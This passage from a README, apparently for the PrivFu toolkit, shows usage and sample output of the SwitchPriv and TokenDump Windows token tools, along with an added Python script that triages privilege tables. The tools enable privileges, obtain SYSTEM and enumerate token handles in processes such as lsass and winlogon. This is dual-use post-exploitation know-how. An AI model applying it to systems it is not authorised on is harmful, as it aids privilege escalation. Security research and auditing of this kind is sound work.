[+] SeIncreaseWorkingSetPrivilege is removed successfully.
[*] Done.

PS C:\Dev> .\SwitchPriv.exe -p 9408 -g

[>] Trying to get available token privilege(s) for the target process.
    [*] Target PID   : 9408
    [*] Process Name : Notepad
[+] Got 4 token privilege(s).

PRIVILEGES INFORMATION
----------------------

Privilege Name          State
======================= ==========================
SeShutdownPrivilege     Disabled
SeChangeNotifyPrivilege EnabledByDefault, Disabled
SeUndockPrivilege       Enabled
SeTimeZonePrivilege     Disabled

[*] Integrity Level : Medium Mandatory Level
[*] Done.
```
If you want to test a specific privilege, you can remove every privilege other than the one you want to test with the -f option as follows:

```
PS C:\Dev> .\SwitchPriv.exe -g

[>] Trying to get available token privilege(s) for the target process.
    [*] Target PID   : 4392
    [*] Process Name : powershell
[+] Got 5 token privilege(s).

PRIVILEGES INFORMATION
----------------------

Privilege Name                State
============================= =========================
SeShutdownPrivilege           Enabled
SeChangeNotifyPrivilege       EnabledByDefault, Enabled
SeUndockPrivilege             Enabled
SeIncreaseWorkingSetPrivilege Enabled
SeTimeZonePrivilege           Enabled

[*] Integrity Level : Medium Mandatory Level
[*] Done.

PS C:\Dev> .\SwitchPriv.exe -f tim

[>] Trying to remove all token privileges except one.
    [*] Target PID   : 4392
    [*] Process Name : powershell
[>] Trying to remove all privileges except for SeTimeZonePrivilege.
[+] SeShutdownPrivilege is removed successfully.
[+] SeChangeNotifyPrivilege is removed successfully.
[+] SeUndockPrivilege is removed successfully.
[+] SeIncreaseWorkingSetPrivilege is removed successfully.
[*] Done.

PS C:\Dev> .\SwitchPriv.exe -g

[>] Trying to get available token privilege(s) for the target process.
    [*] Target PID   : 4392
    [*] Process Name : powershell
[+] Got 1 token privilege(s).

PRIVILEGES INFORMATION
----------------------

Privilege Name      State
=================== =======
SeTimeZonePrivilege Enabled

[*] Integrity Level : Medium Mandatory Level
[*] Done.
```
يمكنك استخدام القيمة المنفصلة للفاصلة لتصفية امتيازات متعددة على النحو التالي:
```
PS C:\Dev> .\SwitchPriv.exe -p 24300 -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 24300
[*] Process Name : powershell
[+] Got 24 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
========================================= =========================
SeIncreaseQuotaPrivilege Disabled
SeSecurityPrivilege Disabled
SeTakeOwnershipPrivilege Disabled
SeLoadDriverPrivilege Disabled
SeSystemProfilePrivilege Disabled
SeSystemtimePrivilege Disabled
SeProfileSingleProcessPrivilege Disabled
SeIncreaseBasePriorityPrivilege Disabled
SeCreatePagefilePrivilege Disabled
SeBackupPrivilege Disabled
SeRestorePrivilege Disabled
SeShutdownPrivilege Disabled
SeDebugPrivilege Enabled
SeSystemEnvironmentPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeRemoteShutdownPrivilege Disabled
SeUndockPrivilege Disabled
SeManageVolumePrivilege Disabled
SeImpersonatePrivilege EnabledByDefault, Enabled
SeCreateGlobalPrivilege EnabledByDefault, Enabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
SeCreateSymbolicLinkPrivilege Disabled
SeDelegateSessionUserImpersonatePrivilege Disabled
[*] Integrity Level : High Mandatory Level
[*] Done.

PS C:\Dev> .\SwitchPriv.exe -p 24300 -f rest,back,deb
[>] Trying to remove all token privileges except one.
[*] Target PID : 24300
[*] Process Name : powershell
[>] Trying to remove privileges other than follows.
[*] SeBackupPrivilege
[*] SeRestorePrivilege
[*] SeDebugPrivilege
[+] SeIncreaseQuotaPrivilege is removed successfully.
[+] SeSecurityPrivilege is removed successfully.
[+] SeTakeOwnershipPrivilege is removed successfully.
[+] SeLoadDriverPrivilege is removed successfully.
[+] SeSystemProfilePrivilege is removed successfully.
[+] SeSystemtimePrivilege is removed successfully.
[+] SeProfileSingleProcessPrivilege is removed successfully.
[+] SeIncreaseBasePriorityPrivilege is removed successfully.
[+] SeCreatePagefilePrivilege is removed successfully.
[+] SeShutdownPrivilege is removed successfully.
[+] SeSystemEnvironmentPrivilege is removed successfully.
[+] SeChangeNotifyPrivilege is removed successfully.
[+] SeRemoteShutdownPrivilege is removed successfully.
[+] SeUndockPrivilege is removed successfully.
[+] SeManageVolumePrivilege is removed successfully.
[+] SeImpersonatePrivilege is removed successfully.
[+] SeCreateGlobalPrivilege is removed successfully.
[+] SeIncreaseWorkingSetPrivilege is removed successfully.
[+] SeTimeZonePrivilege is removed successfully.
[+] SeCreateSymbolicLinkPrivilege is removed successfully.
[+] SeDelegateSessionUserImpersonatePrivilege is removed successfully.
[*] Done.

PS C:\Dev> .\SwitchPriv.exe -p 24300 -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 24300
[*] Process Name : powershell
[+] Got 3 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
========================= ========
SeBackupPrivilege Disabled
SeRestorePrivilege Disabled
SeDebugPrivilege Enabled
[*] Integrity Level : High Mandatory Level
[*] Done.
```
To enable, disable or remove all available token privileges, specify all as the value of the --enable, --disable or --remove option:
```
PS C:\Dev> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled

PS C:\Dev> .\SwitchPriv.exe -e all
[>] Trying to enable all token privileges.
[*] Target PID : 6772
[*] Process Name : powershell
[+] SeShutdownPrivilege is enabled successfully.
[+] SeUndockPrivilege is enabled successfully.
[+] SeIncreaseWorkingSetPrivilege is enabled successfully.
[+] SeTimeZonePrivilege is enabled successfully.
[*] Done.

PS C:\Dev> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== =======
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
```
To find the processes that hold a specific privilege, use the -s option as follows:
```
PS C:\Dev> .\SwitchPriv.exe -s createt
[>] Searching processes have SeCreateTokenPrivilege.
[+] Got 5 process(es).
[*] Memory Compression (PID : 2548)
[*] smss (PID : 372)
[*] lsass (PID : 736)
[*] csrss (PID : 584)
[*] csrss (PID : 504)
[*] Access is denied by following 2 process(es).
[*] System (PID : 4)
[*] Idle (PID : 0)
[*] Done.

PS C:\Dev> .\SwitchPriv.exe -g -p 2548
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 2548
[*] Process Name : Memory Compression
[+] Got 31 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
========================================= =========================
SeCreateTokenPrivilege Disabled
SeAssignPrimaryTokenPrivilege Disabled
SeLockMemoryPrivilege EnabledByDefault, Enabled
SeIncreaseQuotaPrivilege Disabled
SeTcbPrivilege EnabledByDefault, Enabled
SeSecurityPrivilege Disabled
SeTakeOwnershipPrivilege Disabled
SeLoadDriverPrivilege Disabled
SeSystemProfilePrivilege EnabledByDefault, Enabled
SeSystemtimePrivilege Disabled
SeProfileSingleProcessPrivilege EnabledByDefault, Enabled
SeIncreaseBasePriorityPrivilege EnabledByDefault, Enabled
SeCreatePagefilePrivilege EnabledByDefault, Enabled
SeCreatePermanentPrivilege EnabledByDefault, Enabled
SeBackupPrivilege Disabled
SeRestorePrivilege Disabled
SeShutdownPrivilege Disabled
SeDebugPrivilege EnabledByDefault, Enabled
SeAuditPrivilege EnabledByDefault, Enabled
SeSystemEnvironmentPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeUndockPrivilege Disabled
SeManageVolumePrivilege Disabled
SeImpersonatePrivilege EnabledByDefault, Enabled
SeCreateGlobalPrivilege EnabledByDefault, Enabled
SeTrustedCredManAccessPrivilege Disabled
SeRelabelPrivilege Disabled
SeIncreaseWorkingSetPrivilege EnabledByDefault, Enabled
SeTimeZonePrivilege EnabledByDefault, Enabled
SeCreateSymbolicLinkPrivilege EnabledByDefault, Enabled
SeDelegateSessionUserImpersonatePrivilege EnabledByDefault, Enabled
[*] Integrity Level : System Mandatory Level
[*] Done.
```
If you want to set the integrity level, use the --integrity option as follows:
```
PS C:\Dev> whoami /groups | findstr /i level
Mandatory Label\Medium Mandatory Level Label S-1-16-8192

PS C:\Dev> .\SwitchPriv.exe -i 1
[>] Trying to update Integrity Level.
[*] Target PID : 3436
[*] Process Name : powershell
[>] Trying to update Integrity Level to LOW_MANDATORY_LEVEL.
[+] Integrity Level is updated successfully.
[*] Done.

PS C:\Dev> whoami /groups | findstr /i level
Mandatory Label\Low Mandatory Level Label S-1-16-4096
```
To perform any of these actions as SYSTEM, set the -S flag as follows (SeDebugPrivilege and SeImpersonatePrivilege are required):
```
PS C:\Dev> .\SwitchPriv.exe -g -p 2548 -S
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 2548
[*] Process Name : Memory Compression
[>] Trying to get SYSTEM.
[+] Got SYSTEM privilege.
[+] Got 31 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
========================================= =========================
SeCreateTokenPrivilege Disabled
SeAssignPrimaryTokenPrivilege Disabled
SeLockMemoryPrivilege EnabledByDefault, Enabled
SeIncreaseQuotaPrivilege Disabled
SeTcbPrivilege EnabledByDefault, Enabled
SeSecurityPrivilege Disabled
SeTakeOwnershipPrivilege Disabled
SeLoadDriverPrivilege Disabled
SeSystemProfilePrivilege EnabledByDefault, Enabled
SeSystemtimePrivilege Disabled
SeProfileSingleProcessPrivilege EnabledByDefault, Enabled
SeIncreaseBasePriorityPrivilege EnabledByDefault, Enabled
SeCreatePagefilePrivilege EnabledByDefault, Enabled
SeCreatePermanentPrivilege EnabledByDefault, Enabled
SeBackupPrivilege Disabled
SeRestorePrivilege Disabled
SeShutdownPrivilege Disabled
SeDebugPrivilege EnabledByDefault, Enabled
SeAuditPrivilege EnabledByDefault, Enabled
SeSystemEnvironmentPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeUndockPrivilege Disabled
SeManageVolumePrivilege Disabled
SeImpersonatePrivilege EnabledByDefault, Enabled
SeCreateGlobalPrivilege EnabledByDefault, Enabled
SeTrustedCredManAccessPrivilege Disabled
SeRelabelPrivilege Disabled
SeIncreaseWorkingSetPrivilege EnabledByDefault, Enabled
SeTimeZonePrivilege EnabledByDefault, Enabled
SeCreateSymbolicLinkPrivilege EnabledByDefault, Enabled
SeDelegateSessionUserImpersonatePrivilege EnabledByDefault, Enabled
[*] Integrity Level : System Mandatory Level
[*] Done.
```
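As an added example (not PrivFu's own code), the following Python triages the PRIVILEGES INFORMATION tables that SwitchPriv -g, TokenDump -s and whoami /priv print, reads the mandatory label SIDs shown by whoami /groups, and reports which of the privileges the POC table treats as escalation-capable are enabled or merely present. The sensitive-privilege set and the sample tables are constructed for this example.

```python
"""Triage privilege tables printed by SwitchPriv -g, TokenDump -s and
whoami /priv, plus mandatory label SIDs from whoami /groups.
Added example, not part of PrivFu; the sensitive-privilege set and the
sample output below are constructed for this example."""
import re

# Privileges the POC table in this README treats as sufficient for EoP.
# Grouping them into one set is this example's assumption, not PrivFu's list.
SENSITIVE_PRIVILEGES = {
    "SeCreateTokenPrivilege", "SeAssignPrimaryTokenPrivilege",
    "SeImpersonatePrivilege", "SeDebugPrivilege", "SeRestorePrivilege",
    "SeTakeOwnershipPrivilege", "SeTcbPrivilege",
}

# Well-known mandatory label RIDs (S-1-16-<RID>), e.g. 8192 = Medium.
INTEGRITY_LEVELS = {
    0: "Untrusted", 4096: "Low", 8192: "Medium", 8448: "MediumPlus",
    12288: "High", 16384: "System", 20480: "ProtectedProcess",
}

# One table row: name, optional description (whoami only), trailing state.
# The description group is lazy (??) so "EnabledByDefault, Enabled" stays
# whole in the state group instead of being split across the two groups.
_PRIV_ROW = re.compile(
    r"^(Se[A-Za-z]+Privilege)\s+(?:.*?\s+)??"
    r"((?:EnabledByDefault,\s*)?(?:Enabled|Disabled))$"
)
_INTEGRITY_LINE = re.compile(r"Integrity Level\s*:\s*(\w+)")


def parse_privileges(text):
    """Return {privilege: set(state_flags)} for every table row in text."""
    privs = {}
    for line in text.splitlines():
        m = _PRIV_ROW.match(line.strip())
        if m:
            name, state = m.groups()
            privs[name] = {s.strip() for s in state.split(",")}
    return privs


def parse_integrity(text):
    """Return the level word from a '[*] Integrity Level : X ...' line."""
    m = _INTEGRITY_LINE.search(text)
    return m.group(1) if m else None


def integrity_from_sid(sid):
    """Map a mandatory label SID such as S-1-16-8192 to its level name."""
    m = re.fullmatch(r"S-1-16-(\d+)", sid.strip())
    if not m:
        raise ValueError("not a mandatory label SID: %s" % sid)
    return INTEGRITY_LEVELS.get(int(m.group(1)), "Unknown")


def assess(privs):
    """Split sensitive privileges into enabled and present-but-disabled.
    A disabled privilege is not harmless: its holder can re-enable it with
    AdjustTokenPrivileges, which is what SwitchPriv -e shows above.  Only a
    removed privilege (SwitchPriv -r) is gone from that token."""
    present = sorted(p for p in privs if p in SENSITIVE_PRIVILEGES)
    enabled = [p for p in present if "Enabled" in privs[p]]
    disabled = [p for p in present if "Enabled" not in privs[p]]
    return {"enabled": enabled, "disabled": disabled}


# Constructed sample: SwitchPriv -g output after "-f rest,back,deb".
SWITCHPRIV_SAMPLE = """\
[+] Got 3 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
========================= ========
SeBackupPrivilege Disabled
SeRestorePrivilege Disabled
SeDebugPrivilege Enabled
[*] Integrity Level : High Mandatory Level
[*] Done.
"""

# Constructed sample in whoami /priv layout (three columns).
WHOAMI_SAMPLE = """\
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
"""

if __name__ == "__main__":
    for label, sample in (("SwitchPriv", SWITCHPRIV_SAMPLE),
                          ("whoami", WHOAMI_SAMPLE)):
        privs = parse_privileges(sample)
        print(label, parse_integrity(sample), assess(privs))
    print(integrity_from_sid("S-1-16-4096"))  # Low, as after SwitchPriv -i 1
```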
Back to Top
Project
This tool dumps token information:
```
C:\Dev>.\TokenDump.exe -h
TokenDump - Tool to dump processs token information.
Usage: TokenDump.exe [Options]
-h, --help : Displays this help message.
-d, --debug : Flag to enable SeDebugPrivilege.
-e, --enum : Flag to enumerate brief information tokens for processes or handles.
-T, --thread : Flag to scan thead tokens. Use with -e option.
-H, --handle : Flag to scan token handles. Use with -e option.
-s, --scan : Flag to get verbose information for a specific process, thread or handle.
-a, --account : Specifies account name filter string. Use with -e flag.
-p, --pid : Specifies a target PID in decimal format. Use with -s flag, or -e and -H flag.
-t, --tid : Specifies a target TID in decimal format. Use with -s flag and -p option.
-v, --value : Specifies a token handle value in hex format. Use with -s flag and -p option.
```
To enumerate the tokens of all processes, just set the -e flag:
```
C:\Dev>.\TokenDump.exe -e
[>] Trying to enumerate process token.
PID Session Process Name Token User Integrity Restricted AppContainer
==== ======= =========================== ============================ ========= ========== ============
5004 0 svchost.exe NT AUTHORITY\SYSTEM System False False
3728 0 conhost.exe NT AUTHORITY\SYSTEM System False False
--snip--
6712 0 svchost.exe NT AUTHORITY\LOCAL SERVICE System False False
1972 0 svchost.exe NT AUTHORITY\SYSTEM System False False
[+] Got 129 token information.
[*] Found 7 account(s).
[*] NT AUTHORITY\SYSTEM
[*] dev22h2\user
[*] NT AUTHORITY\LOCAL SERVICE
[*] NT AUTHORITY\NETWORK SERVICE
[*] Font Driver Host\UMFD-0
[*] Font Driver Host\UMFD-1
[*] Window Manager\DWM-1
[*] Done.
```
If you want to enable SeDebugPrivilege, set the -d flag as follows:
```
C:\Dev>.\TokenDump.exe -e -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate process token.
PID Session Process Name Token User Integrity Restricted AppContainer
==== ======= =========================== ============================ ========= ========== ============
5004 0 svchost.exe NT AUTHORITY\SYSTEM System False False
3728 0 conhost.exe NT AUTHORITY\SYSTEM System False False
3740 0 vm3dservice.exe NT AUTHORITY\SYSTEM System False False
--snip--
```
When the -H flag is set together with the -e flag, TokenDump tries to enumerate token handle information:
```
C:\Dev>.\TokenDump.exe -e -H -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate token handles.
[Token Handle(s) - winlogon.exe (PID: 704)]
Handle Session Token User Integrity Restricted AppContainer Token Type Impersonation Level
====== ======= =================== ========= ========== ============ ============= ===================
0x2B0 1 NT AUTHORITY\SYSTEM System False False Primary Anonymous
0x2B4 1 NT AUTHORITY\SYSTEM System False False Primary Anonymous
0x38C 1 dev22h2\user Medium False False Primary Impersonation
--snip--
[Token Handle(s) - svchost.exe (PID: 3272)]
Handle Session Token User Integrity Restricted AppContainer Token Type Impersonation Level
====== ======= ========================== ========= ========== ============ ========== ===================
0x168 0 NT AUTHORITY\LOCAL SERVICE System False False Primary Anonymous
[+] Got 819 handle(s).
[*] Found 8 account(s).
[*] NT AUTHORITY\SYSTEM
[*] dev22h2\user
[*] Font Driver Host\UMFD-1
[*] Font Driver Host\UMFD-0
[*] NT AUTHORITY\NETWORK SERVICE
[*] Window Manager\DWM-1
[*] NT AUTHORITY\LOCAL SERVICE
[*] NT AUTHORITY\ANONYMOUS LOGON
[*] Done.
```
When a PID is specified with the -p option, TokenDump enumerates only the handles of the specified process:
```
C:\Dev>.\TokenDump.exe -e -H -d -p 704
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate token handles.
[Token Handle(s) - winlogon.exe (PID: 704)]
Handle Session Token User Integrity Restricted AppContainer Token Type Impersonation Level
====== ======= =================== ========= ========== ============ ============= ===================
0x2B0 1 NT AUTHORITY\SYSTEM System False False Primary Anonymous
0x2B4 1 NT AUTHORITY\SYSTEM System False False Primary Anonymous
0x38C 1 dev22h2\user Medium False False Primary Impersonation
0x398 1 dev22h2\user High False False Primary Identification
0x3C4 1 dev22h2\user Medium False False Impersonation Impersonation
0x3C8 1 dev22h2\user Medium False False Impersonation Impersonation
0x3D0 1 dev22h2\user Medium False False Impersonation Impersonation
0x3D4 1 dev22h2\user Medium False False Impersonation Impersonation
[+] Got 8 handle(s).
[*] Found 2 account(s).
[*] NT AUTHORITY\SYSTEM
[*] dev22h2\user
[*] Done.
```
To enumerate impersonated thread tokens, set the -T flag together with -e as follows:
```
C:\Dev>.\TokenDump.exe -e -T -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate impersonated threads.
PID TID Session Process Name Token User Integrity Impersonation Level
==== ==== ======= ============ =================== ========= ===================
1952 2000 0 svchost.exe NT AUTHORITY\SYSTEM System Impersonation
1952 2300 0 svchost.exe NT AUTHORITY\SYSTEM System Impersonation
3516 4348 0 svchost.exe NT AUTHORITY\SYSTEM System Impersonation
3516 4656 0 svchost.exe NT AUTHORITY\SYSTEM System Impersonation
[+] Got 4 thread(s).
[*] Found 1 account(s).
[*] NT AUTHORITY\SYSTEM
[*] Done.
```
If you want to filter these results by token user name, pass a filter string as the -a option, as follows:
```
C:\Dev>.\TokenDump.exe -e -a network -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate process token.
PID Session Process Name Token User Integrity Restricted AppContainer
==== ======= ============ ============================ ========= ========== ============
1932 0 svchost.exe NT AUTHORITY\NETWORK SERVICE System False False
3500 0 svchost.exe NT AUTHORITY\NETWORK SERVICE System False False
2904 0 svchost.exe NT AUTHORITY\NETWORK SERVICE System False False
2504 0 svchost.exe NT AUTHORITY\NETWORK SERVICE System False False
7012 0 msdtc.exe NT AUTHORITY\NETWORK SERVICE System False False
7092 0 sppsvc.exe NT AUTHORITY\NETWORK SERVICE System False False
1676 0 svchost.exe NT AUTHORITY\NETWORK SERVICE System False False
3584 0 WmiPrvSE.exe NT AUTHORITY\NETWORK SERVICE System False False
1000 0 svchost.exe NT AUTHORITY\NETWORK SERVICE System False False
[+] Got 9 token information.
[*] Found 7 account(s).
[*] NT AUTHORITY\SYSTEM
[*] dev22h2\user
[*] NT AUTHORITY\LOCAL SERVICE
[*] NT AUTHORITY\NETWORK SERVICE
[*] Font Driver Host\UMFD-0
[*] Font Driver Host\UMFD-1
[*] Window Manager\DWM-1
[*] Done.

C:\Dev>.\TokenDump.exe -e -a network -d -H
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate token handles.
[Token Handle(s) - lsass.exe (PID: 768)]
Handle Session Token User Integrity Restricted AppContainer Token Type Impersonation Level
====== ======= ============================ ========= ========== ============ ============= ===================
0x914 0 NT AUTHORITY\NETWORK SERVICE System False False Impersonation Impersonation
--snip--
[Token Handle(s) - msdtc.exe (PID: 7012)]
Handle Session Token User Integrity Restricted AppContainer Token Type Impersonation Level
====== ======= ============================ ========= ========== ============ ========== ===================
0x23C 0 NT AUTHORITY\NETWORK SERVICE System False False Primary Anonymous
[+] Got 27 handle(s).
[*] Found 8 account(s).
[*] NT AUTHORITY\SYSTEM
[*] dev22h2\user
[*] Font Driver Host\UMFD-1
[*] Font Driver Host\UMFD-0
[*] NT AUTHORITY\NETWORK SERVICE
[*] Window Manager\DWM-1
[*] NT AUTHORITY\LOCAL SERVICE
[*] NT AUTHORITY\ANONYMOUS LOGON
[*] Done.
```
To get verbose information for a specific process, set the -s flag and pass the target PID as the value of the -p option:
```
C:\Dev>.\TokenDump.exe -s -p 5996
[>] Trying to dump process token information.
[Token Information for StartMenuExperienceHost.exe (PID: 5996)]
ImageFilePath : C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
CommandLine : "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
Token User : dev22h2\user (SID: S-1-5-21-3896868301-3921591151-1374190648-1001)
Token Owner : dev22h2\user (SID: S-1-5-21-3896868301-3921591151-1374190648-1001)
Primary Group : dev22h2\None (SID: S-1-5-21-3896868301-3921591151-1374190648-513)
Token Type : Primary
Impersonation Level : Anonymous
Token ID : 0x0000000000063D9A
Authentication ID : 0x000000000001DFE5
Original ID : 0x00000000000003E7
Modified ID : 0x0000000000063D24
Integrity Level : Low
Protection Level : N/A
Session ID : 1
Elevation Type : Limited
Mandatory Policy : NoWriteUp
Elevated : False
AppContainer : True
TokenFlags : VirtualizeAllowed, IsFiltered, LowBox
AppContainer Name : microsoft.windows.startmenuexperiencehost_cw5n1h2txyewy
AppContainer SID : S-1-15-2-515815643-2845804217-1874292103-218650560-777617685-4287762684-137415000
AppContainer Number : 2
Has Linked Token : True
Token Source : User32
Token Source ID : 0x000000000001DE9D
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= =========================
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeIncreaseWorkingSetPrivilege Disabled
GROUP INFORMATION
-----------------
Group Name Attributes
============================================================= =============================================
dev22h2\None Mandatory, EnabledByDefault, Enabled
Everyone Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\Local account and member of Administrators group UseForDenyOnly
BUILTIN\Administrators UseForDenyOnly
BUILTIN\Users Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\INTERACTIVE Mandatory, EnabledByDefault, Enabled
CONSOLE LOGON Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\Authenticated Users Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\This Organization Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\Local account Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\LogonSessionId_0_122425 Mandatory, EnabledByDefault, Enabled, LogonId
LOCAL Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\NTLM Authentication Mandatory, EnabledByDefault, Enabled
Mandatory Label\Low Mandatory Level Integrity, IntegrityEnabled
APPCONTAINER CAPABILITIES
-------------------------
Capability Name Flags
========================================================================== =======
APPLICATION PACKAGE AUTHORITY\Your Internet connection Enabled
APPLICATION PACKAGE AUTHORITY\Your home or work networks Enabled
NAMED CAPABILITIES\PackageQuery Enabled
NAMED CAPABILITIES\ActivitySystem Enabled
NAMED CAPABILITIES\PreviewStore Enabled
NAMED CAPABILITIES\CortanaPermissions Enabled
NAMED CAPABILITIES\AppointmentsSystem Enabled
NAMED CAPABILITIES\TeamEditionExperience Enabled
NAMED CAPABILITIES\ShellExperience Enabled
NAMED CAPABILITIES\PackageContents Enabled
NAMED CAPABILITIES\VisualElementsSystem Enabled
NAMED CAPABILITIES\UserAccountInformation Enabled
NAMED CAPABILITIES\ActivityData Enabled
NAMED CAPABILITIES\CloudStore Enabled
NAMED CAPABILITIES\TargetedContent Enabled
NAMED CAPABILITIES\StoreAppInstall Enabled
NAMED CAPABILITIES\StoreLicenseManagement Enabled
NAMED CAPABILITIES\CortanaSettings Enabled
NAMED CAPABILITIES\DependencyTarget Enabled
NAMED CAPABILITIES\SearchSettings Enabled
NAMED CAPABILITIES\CellularData Enabled
NAMED CAPABILITIES\WifiData Enabled
PACKAGE CAPABILITY\microsoft.windows.startmenuexperiencehost_cw5n1h2txyewy Enabled
NAMED CAPABILITIES\AccessoryManager Enabled
NAMED CAPABILITIES\UserAccountInformation Enabled
DACL INFORMATION
----------------
Account Name Access Flags Type
======================================================= =========================== ===== =============
dev22h2\user GenericAll None AccessAllowed
NT AUTHORITY\SYSTEM GenericAll None AccessAllowed
NT AUTHORITY\LogonSessionId_0_122425 GenericExecute, GenericRead None AccessAllowed
microsoft.windows.startmenuexperiencehost_cw5n1h2txyewy GenericAll None AccessAllowed
SECURITY ATTRIBUTES INFORMATION
-------------------------------
[*] WIN://SYSAPPID
Flags : None
Type : String
Value[0x00] : Microsoft.Windows.StartMenuExperienceHost_10.0.22621.1_neutral_neutral_cw5n1h2txyewy
Value[0x01] : App
Value[0x02] : Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy
[*] WIN://PKG
Flags : None
Type : UInt64
Value[0x00] : 0x0000000200000001
[*] WIN://PKGHOSTID
Flags : None
Type : UInt64
Value[0x00] : 0x1000000000000001
[*] TSA://ProcUnique
Flags : NonInheritable, Unique
Type : UInt64
Value[0x00] : 0x0000000000000041
Value[0x01] : 0x0000000000063D9B
[Linked Token Information for StartMenuExperienceHost.exe (PID: 5996)]
Token User : dev22h2\user (SID: S-1-5-21-3896868301-3921591151-1374190648-1001)
Token Owner : BUILTIN\Administrators (SID: S-1-5-32-544)
Primary Group : dev22h2\None (SID: S-1-5-21-3896868301-3921591151-1374190648-513)
Token Type : Impersonation
Impersonation Level : Identification
Token ID : 0x000000000016ECE6
Authentication ID : 0x000000000001DF83
Original ID : 0x00000000000003E7
Modified ID : 0x000000000001DFE4
Integrity Level : High
Protection Level : N/A
Session ID : 1
Elevation Type : Full
Mandatory Policy : NoWriteUp, NewProcessMin
Elevated : True
AppContainer : False
TokenFlags : NotLow
Token Source : User32
Token Source ID : 0x000000000001DE9D
PRIVILEGES INFORMATION
----------------------
Privilege Name State
========================================= =========================
SeIncreaseQuotaPrivilege Disabled
SeSecurityPrivilege Disabled
SeTakeOwnershipPrivilege Disabled
SeLoadDriverPrivilege Disabled
SeSystemProfilePrivilege Disabled
SeSystemtimePrivilege Disabled
SeProfileSingleProcessPrivilege Disabled
SeIncreaseBasePriorityPrivilege Disabled
SeCreatePagefilePrivilege Disabled
SeBackupPrivilege Disabled
SeRestorePrivilege Disabled
SeShutdownPrivilege Disabled
SeDebugPrivilege Disabled
SeSystemEnvironmentPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeRemoteShutdownPrivilege Disabled
SeUndockPrivilege Disabled
SeManageVolumePrivilege Disabled
SeImpersonatePrivilege EnabledByDefault, Enabled
SeCreateGlobalPrivilege EnabledByDefault, Enabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
SeCreateSymbolicLinkPrivilege Disabled
SeDelegateSessionUserImpersonatePrivilege Disabled
GROUP INFORMATION
-----------------
Group Name Attributes
============================================================= =============================================
dev22h2\None Mandatory, EnabledByDefault, Enabled
Everyone Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\Local account and member of Administrators group Mandatory, EnabledByDefault, Enabled
BUILTIN\Administrators Mandatory, EnabledByDefault, Enabled, Owner
BUILTIN\Users Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\INTERACTIVE Mandatory, EnabledByDefault, Enabled
CONSOLE LOGON Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\Authenticated Users Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\This Organization Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\Local account Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\LogonSessionId_0_122425 Mandatory, EnabledByDefault, Enabled, LogonId
LOCAL Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\NTLM Authentication Mandatory, EnabledByDefault, Enabled
Mandatory Label\High Mandatory Level Integrity, IntegrityEnabled
DACL INFORMATION
----------------
Account Name Access Flags Type
==================================== =========================== ===== =============
BUILTIN\Administrators GenericAll None AccessAllowed
NT AUTHORITY\SYSTEM GenericAll None AccessAllowed
NT AUTHORITY\LogonSessionId_0_122425 GenericExecute, GenericRead None AccessAllowed
SECURITY ATTRIBUTES INFORMATION
-------------------------------
